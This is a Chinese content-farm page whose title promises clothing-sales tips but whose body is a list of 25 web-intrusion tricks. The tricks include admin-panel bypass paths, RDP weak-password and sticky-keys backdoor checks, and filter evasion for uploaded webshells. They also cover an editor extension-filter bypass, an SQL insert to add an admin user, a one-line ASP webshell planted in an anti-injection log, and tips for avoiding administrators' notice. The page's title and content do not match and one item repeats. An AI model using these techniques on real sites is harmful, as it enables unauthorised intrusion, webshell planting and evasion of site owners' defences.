【服装销售技巧总结】渗透技巧,小总结!

发布时间:2019-02-03   来源:工作总结    
字号:

【www.jxscct.com--工作总结】

下面是五度学习网www.wudu001.com分享的销售高手总结的十悟。供大家参考!   渗透技巧,小总结!

  1.拿到一个网站后,先进行扫描,对网站全局进行爬行。

  2.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可直接进入后台

  3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门

  4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选--查看即可直接进入后台。

  4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选--查看即可直接进入后台。

  5.:javascript:document.write("<ahref='http://www.xxx.com/uploadfile/1.asp'>fuck</a>") 点击GO即可进入shell。

  6.遇到一流信息监控拦截系统时,上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。

  7.eweb编辑器后台,增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,尝试增加一个aaspsp,再上传asp就会解析了。

  8.用注入工具猜解到表段却猜解不到字段的时候,到网站后台右键查看源文件,一般账号密码后面的就是字段,之后在注入工具里添加字段进行猜解即可。

  9.当注入工具猜解表段,但猜解字段时提示长度超过50之类,不妨扔到穿山甲去猜解一下。

  10.得知表段跟字段之后,使用SQL语句在ACCESS数据库里加个用户名及密码的语句:Insert into admin(user,pwd) values('jianmei','daxia')

  11.当获得管理员密码却不知道管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名字就是管理员的帐号了。

  12.爆破ASP+IIS架设的网站web绝对路径,假设网站主页为:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

  13.有的站长很懒什么也不改,当我们得知网站的cms的时候,不妨去下载一套找找数据库路径,以及敏感信息,再尝试默认相关的可利用资源。

  14.菜刀里点击一句话木马右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改为UTF-8.

  15.入侵千万别忘了ftp,试试诺口令,ftp的默认端口:21 默认帐号密码:test

  16.破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可

  17.好多网站的后台地址是:admin_index.asp manage_login.asp

  18.有时在木马代码里加上了gif89a,上传成功访问的时候却出现了像图片一样的错误图像,说明服务器把gif89a当做图片来处理了,不要带gif89a即可。问就可以了。

  19.找eweb编辑器的时候,如果默认的被改了,到前台去找图片右键看下路径,根据图片的目录猜eweb编辑器的目录,后台也是用此思路。

  20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\

  21.扫旁站的时候,是不是想看每个站点是什么cms呢?用轩辕剑扫描就可以显示系统特征。

  22.网站的主站一般都很安全,这时就要旁注或C段了,但是想知道各个IP段开放了什么端口吗?用“啊D网络工具包”里面的IP端口扫描最理想了。

  23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这个文件:sqlin.asp,如果存在,在注入点后面植入一句话木马:‘excute(request("TNT"))

  接着用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。

  24.有的后台不显示验证码,往注册表里添加一个ceg即可突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了。

  REGEDIT4

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]

  "BlockXBM"=dword:00000000

  25.内网渗透时尽量少登录3389,以免被管理员发现。

更多相关内容:
《【服装销售技巧总结】渗透技巧,小总结!.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

推荐阅读

智慧助老公益活动总结汇编4篇

智慧助老公益活动总结汇编4篇

下面是小编精心整理的智慧助老公益活动总结汇编4篇,仅供参考,大家一起来看看吧。
2024-04-28
社会主义核心价值观主题实践教育月活动总结汇报(合集六篇)

社会主义核心价值观主题实践教育月活动总结汇报(合集六篇)

汇报是向上级机关报告工作、反映情况、提出意见或者建议,答复上级机关的询问时使用的公文。下面是小编为大家整理的社会主义核心价值观主题实践教育月活动总结汇报(合集六篇),欢迎大家借鉴与参考,希望对大家有所帮助。
2024-04-28
小学民法典宣传月活动总结集合5篇

小学民法典宣传月活动总结集合5篇

活动总结,顾名思义,就是对所做活动进行总体归纳和全面概括的具体结论,我们可以从中获得经验。下面是小编精心整理的小学民法典宣传月活动总结集合5篇,仅供参考,大家一起来看看吧。
2024-04-28
护士节活动总结精选三篇

护士节活动总结精选三篇

活动方案指的是为某一次活动所指定的书面计划,具体行动实施办法细则,步骤等。对具体将要进行的活动进行书面的计划,对每个步骤的详细分析,研究,以确定活动的顺利,圆满进行。以下是小编整理的护士节活动总结精选三篇,仅供参考,大家一起来看看吧。
2024-04-28
劳动心得体会1000字大学生范文(精选三篇)

劳动心得体会1000字大学生范文(精选三篇)

心得体会是指一种读书、实践后所写的感受性文字。语言类读书心得同数学札记相近;体会是指将学习的东西运用到实践中去,通过实践反思学习内容并记录下来的文字,近似于经验总结。以下是小编为大家收集的劳动心得体会1000字大学生范文(精选三篇),仅供参考,欢迎大家阅读。
2024-04-28
网站内容来自网络,如有侵权请联系我们,立即删除! Copyright © 查查通作文网 京ICP备16535803号